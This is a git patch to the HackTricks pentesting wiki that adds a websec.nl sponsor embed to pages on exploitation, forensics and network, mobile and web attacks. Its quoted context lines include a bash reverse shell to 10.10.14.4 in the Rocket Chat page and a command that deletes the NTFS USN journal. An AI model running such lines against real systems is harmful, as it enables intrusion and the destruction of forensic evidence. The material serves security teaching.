From 4b64ce2de1db2f34212d23e9487d41f84b2f1e16 Mon Sep 17 00:00:00 2001 
From: Carlos Polop
Date: Mon, 8 Apr 2024 00:37:55 +0200
Subject: [PATCH] w
---
 .../rop-leaking-libc-template.md | 9 +++++++++
 .../anti-forensic-techniques.md | 8 ++++++++
 .../windows-forensics/README.md | 8 ++++++++
 .../image-acquisition-and-mount.md | 8 ++++++++
 .../pentesting-network/glbp-and-hsrp-attacks.md | 7 +++++++
 .../pentesting-network/nmap-summary-esp.md | 8 ++++++++
 .../phishing-methodology/clone-a-website.md | 8 ++++++++
 .../sensitive-mounts.md | 8 ++++++++
 .../macos-security-protections/macos-gatekeeper.md | 12 ++++++++++--
 .../android-app-pentesting/content-protocol.md | 6 ++++++
 .../install-burp-certificate.md | 9 +++++++++
 .../android-app-pentesting/tapjacking.md | 9 +++++++++
 mobile-pentesting/ios-pentesting/ios-uipasteboard.md | 10 ++++++++++
 .../11211-memcache/memcache-commands.md | 10 ++++++++++
 .../4786-cisco-smart-install.md | 10 ++++++++++
 network-services-pentesting/69-udp-tftp.md | 9 +++++++++
 network-services-pentesting/pentesting-rlogin.md | 10 ++++++++++
 network-services-pentesting/pentesting-rpcbind.md | 11 +++++++++++
 network-services-pentesting/pentesting-sap.md | 7 +++++++
 network-services-pentesting/pentesting-web/drupal.md | 10 ++++++++++
 .../pentesting-web/rocket-chat.md | 10 ++++++++++
 .../pentesting-web/vmware-esx-vcenter....md | 10 ++++++++--
 pentesting-web/cors-bypass.md | 9 +++++++++
 pentesting-web/dependency-confusion.md | 9 +++++++++
 pentesting-web/oauth-to-account-takeover.md | 10 ++++++++++
 pentesting-web/parameter-pollution.md | 10 ++++++++++
 pentesting-web/proxy-waf-protections-bypass.md | 9 +++++++++
 todo/more-tools.md | 9 +++++++++
 todo/radio-hacking/flipper-zero/fz-125khz-rfid.md | 10 ++++++++++
 .../active-directory-methodology/abusing-ad-mssql.md | 10 ++++++++++
 .../ad-certificates/domain-escalation.md | 8 ++++++++
 .../kerberos-double-hop-problem.md | 9 +++++++++
 .../active-directory-methodology/laps.md | 9 +++++++++
 .../over-pass-the-hash-pass-the-key.md | 9 +++++++++
.../basic-powershell-for-pentesters/powerview.md | 10 ++++++++++
 35 files changed, 314 insertions(+), 4 deletions(-)
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index e82c5a751..f227ade10 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 {% code title="template.py" %}
 ```python
 from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
@@ -232,6 +236,11 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 91f89eb8e..1db2b7f7c 100644
--- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 # Timestamps
@@ -163,6 +167,10 @@ It's also possible to modify the configuration of which files are going to be co
 * `fsutil usn deletejournal /d c:`
+
+
+{% embed url="https://websec.nl/" %}
+
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index 2b8d2400b..113e63371 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -16,6 +16,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 ## Generic Windows Artifacts
 ### Windows 10 Notifications
@@ -510,6 +514,10 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
 Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
+
+
+{% embed url="https://websec.nl/" %}
+
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
index ebacbbf4d..fabb1028f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
@@ -12,6 +12,10 @@
+
+
+{% embed url="https://websec.nl/" %}
+
 ## Acquisition
 ### DD
@@ -120,6 +124,10 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik
 mount disk.img /mnt -o ro,offset=$((2048*512))
 ```
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
index a9f7f8255..c529886c1 100644
--- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 ## FHRP Hijacking Overview
@@ -136,6 +140,9 @@ Executing these steps places the attacker in a position to intercept and manipul
 ## References
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+
+
+{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
index 91ce4bd5b..19b61817e 100644
--- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
+++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 ```
 nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
 ```
@@ -267,6 +271,10 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us
 If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
index bd4b6e8c3..18a3aa6da 100644
--- a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
+++ b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 For a phishing assessment sometimes it might be useful to completely **clone a website**.
@@ -40,6 +45,9 @@ goclone
 #https://github.com/trustedsec/social-engineer-toolkit
 ```
+
+
+{% embed url="https://websec.nl/" %}
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 4011e03ab..fe0026822 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected. **You can find further details of each potential vuln in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
@@ -183,6 +187,10 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
 * [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
 * [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
index 55e0a0b02..a8a7a53ab 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@@ -9,11 +9,14 @@
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)
-*
-* .
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Gatekeeper
 **Gatekeeper** is a security feature developed for Mac operating systems, designed to ensure that users **run only trusted software** on their systems. It functions by **validating software** that a user downloads and attempts to open from **sources outside the App Store**, such as an app, a plug-in, or an installer package.
@@ -461,6 +464,11 @@ aa archive -d s/ -o app.aar
 In an ".app" bundle if the quarantine xattr is not added to it, when executing it **Gatekeeper won't be triggered**.
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/mobile-pentesting/android-app-pentesting/content-protocol.md b/mobile-pentesting/android-app-pentesting/content-protocol.md
index 87becb275..ea2849016 100644
--- a/mobile-pentesting/android-app-pentesting/content-protocol.md
+++ b/mobile-pentesting/android-app-pentesting/content-protocol.md
@@ -14,6 +14,9 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
 **This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
@@ -94,6 +97,9 @@ Proof-of-Concept HTML:
 ```
+
+
+{% embed url="https://websec.nl/" %}
diff --git a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
index 161547420..bd3d89bc9 100644
--- a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
+++ b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## On a Virtual Machine
 First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
@@ -165,6 +170,10 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/
 * [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/mobile-pentesting/android-app-pentesting/tapjacking.md b/mobile-pentesting/android-app-pentesting/tapjacking.md
index 46883bf72..e37b8bfd2 100644
--- a/mobile-pentesting/android-app-pentesting/tapjacking.md
+++ b/mobile-pentesting/android-app-pentesting/tapjacking.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## **Basic Information**
 **Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\
@@ -74,6 +79,10 @@ The mitigation is relatively simple as the developer may choose not to receive t
 >
 > To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window.
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
index bc2afeb33..79c73686f 100644
--- a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
+++ b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 Data sharing within and across applications on iOS devices is facilitated by the [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) mechanism, which is divided into two primary categories:
 - **Systemwide general pasteboard**: This is used for sharing data with **any application** and is designed to persist data across device restarts and app uninstallations, a feature that has been available since iOS 10.
@@ -79,6 +84,11 @@ setInterval(function () {
 * [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
 * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/11211-memcache/memcache-commands.md b/network-services-pentesting/11211-memcache/memcache-commands.md
index 95d6e8900..2dee67897 100644
--- a/network-services-pentesting/11211-memcache/memcache-commands.md
+++ b/network-services-pentesting/11211-memcache/memcache-commands.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Commands Cheat-Sheet
 **From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)
@@ -140,6 +145,11 @@ END
 This at least helps to see if any keys are used. To dump the key names from a PHP script that already does the memcache access you can use the PHP code from [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html).
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md
index 85f3c01fa..9187ea18c 100644
--- a/network-services-pentesting/4786-cisco-smart-install.md
+++ b/network-services-pentesting/4786-cisco-smart-install.md
@@ -12,6 +12,11 @@
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Basic Information
 **Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.**
@@ -49,6 +54,11 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder
+ +
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/69-udp-tftp.md b/network-services-pentesting/69-udp-tftp.md
index b967d7a37..a5997d035 100644
--- a/network-services-pentesting/69-udp-tftp.md
+++ b/network-services-pentesting/69-udp-tftp.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 # Basic Information
@@ -56,6 +60,11 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
 * `port:69`
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md
index 57b7ad207..3e0932225 100644
--- a/network-services-pentesting/pentesting-rlogin.md
+++ b/network-services-pentesting/pentesting-rlogin.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Basic Information
 In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections.
@@ -46,6 +51,11 @@ rlogin -l
 find / -name .rhosts
 ```
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md
index 574b14a2e..8a00929aa 100644
--- a/network-services-pentesting/pentesting-rpcbind.md
+++ b/network-services-pentesting/pentesting-rpcbind.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Basic Information
 **Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.
@@ -96,6 +101,11 @@ When conducting a **nmap scan** and discovering open NFS ports with port 111 bei
 * Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked).
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## HackTricks Automatic Commands
 ```
@@ -122,6 +132,7 @@ Entry_3:
 Command: nmap -sSUC -p 111 {IP}
 ```
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/pentesting-sap.md b/network-services-pentesting/pentesting-sap.md
index 100a1a081..850a02e3c 100644
--- a/network-services-pentesting/pentesting-sap.md
+++ b/network-services-pentesting/pentesting-sap.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 # Introduction about SAP
@@ -318,6 +322,9 @@ bizploit> start
 * [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
 * [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)
+
+
+{% embed url="https://websec.nl/" %}
diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md
index ef1fc208f..2a023b93c 100644
--- a/network-services-pentesting/pentesting-web/drupal.md
+++ b/network-services-pentesting/pentesting-web/drupal.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Discovery
 * Check **meta**
@@ -189,6 +194,11 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from
 * [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 09307e0d1..1687249ce 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## RCE
 If you are admin inside Rocket Chat you can get RCE.
@@ -46,6 +51,11 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
 * Call it with curl and you shuold receive the rev shell
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
index f281a3098..152f2d797 100644
--- a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
+++ b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -14,10 +14,13 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
 # Enumeration
-```text
+```bash
 nmap -sV --script "http-vmware-path-vuln or vmware-version" -p
 msf> use auxiliary/scanner/vmware/esx_fingerprint
 msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
@@ -25,12 +28,15 @@ msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
 # Bruteforce
-```text
+```bash
 msf> auxiliary/scanner/vmware/vmware_http_login
 ```
 If you find valid credentials, you can use more metasploit scanner modules to obtain information.
+
+
+{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
index 9658bf3cf..90920b5ab 100644
--- a/pentesting-web/cors-bypass.md
+++ b/pentesting-web/cors-bypass.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 ## What is CORS?
 Cross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources.
@@ -398,6 +402,11 @@ You can find more information about the previous bypass techniques and how to us
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration)
 * [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b)
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md
index 47642f347..06dc9e4d8 100644
--- a/pentesting-web/dependency-confusion.md
+++ b/pentesting-web/dependency-confusion.md
@@ -12,6 +12,11 @@
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Basic Information
 In summary, a dependency confusion vulnerability occurs when a project is using a library with a **misspelled** name, **inexistent** or with an **unspecified version** and the used dependency repository allows to **gather updated versions from public** repositories.
@@ -51,6 +56,10 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b
 * [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
 * [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md
index 8faac7bfc..bd35b55a5 100644
--- a/pentesting-web/oauth-to-account-takeover.md
+++ b/pentesting-web/oauth-to-account-takeover.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Basic Information
 OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server).
@@ -220,6 +225,11 @@ If the platform you are testing is an OAuth provider [**read this to test for po
 * [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
 * [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md
index d4c211e84..59e546848 100644
--- a/pentesting-web/parameter-pollution.md
+++ b/pentesting-web/parameter-pollution.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 # HTTP Parameter Pollution (HPP) Overview
 HTTP Parameter Pollution (HPP) is a technique where attackers manipulate HTTP parameters to change the behavior of a web application in unintended ways. This manipulation is done by adding, modifying, or duplicating HTTP parameters. The effect of these manipulations is not directly visible to the user but can significantly alter the application's functionality on the server side, with observable impacts on the client side.
@@ -65,6 +70,11 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei
 * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
 * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-web/proxy-waf-protections-bypass.md b/pentesting-web/proxy-waf-protections-bypass.md
index 7b667cfbb..259fd6f8e 100644
--- a/pentesting-web/proxy-waf-protections-bypass.md
+++ b/pentesting-web/proxy-waf-protections-bypass.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 ## Bypass Nginx ACL Rules with Pathname Manipulation Techniques [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
@@ -122,6 +126,11 @@ It was possible to bypass AWS WAF because it wouldn't understand that the next l
 * [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 * [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/todo/more-tools.md b/todo/more-tools.md
index c9b497266..c9251cbee 100644
--- a/todo/more-tools.md
+++ b/todo/more-tools.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
 # BlueTeam
@@ -131,6 +135,11 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla
 * [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index 8e58cab03..ea6164b4f 100644
--- a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## Intro
 For more info about how 125kHz tags work check:
@@ -63,6 +68,11 @@ After **copying** a card or **entering** the ID **manually** it's possible to **
 * [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
+
+
+{% embed url="https://websec.nl/" %}
+
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 3ac93e905..d0f8271a1 100644
--- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -12,6 +12,11 @@
+
+
+{% embed url="https://websec.nl/" %}
+
+
 ## **MSSQL Enumeration / Discovery**
 The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
@@ -205,6 +210,11 @@ A strategy that many authors have come up with is to force a SYSTEM service to a
 [SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
+
+
+
+{% embed url="https://websec.nl/" %}
+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
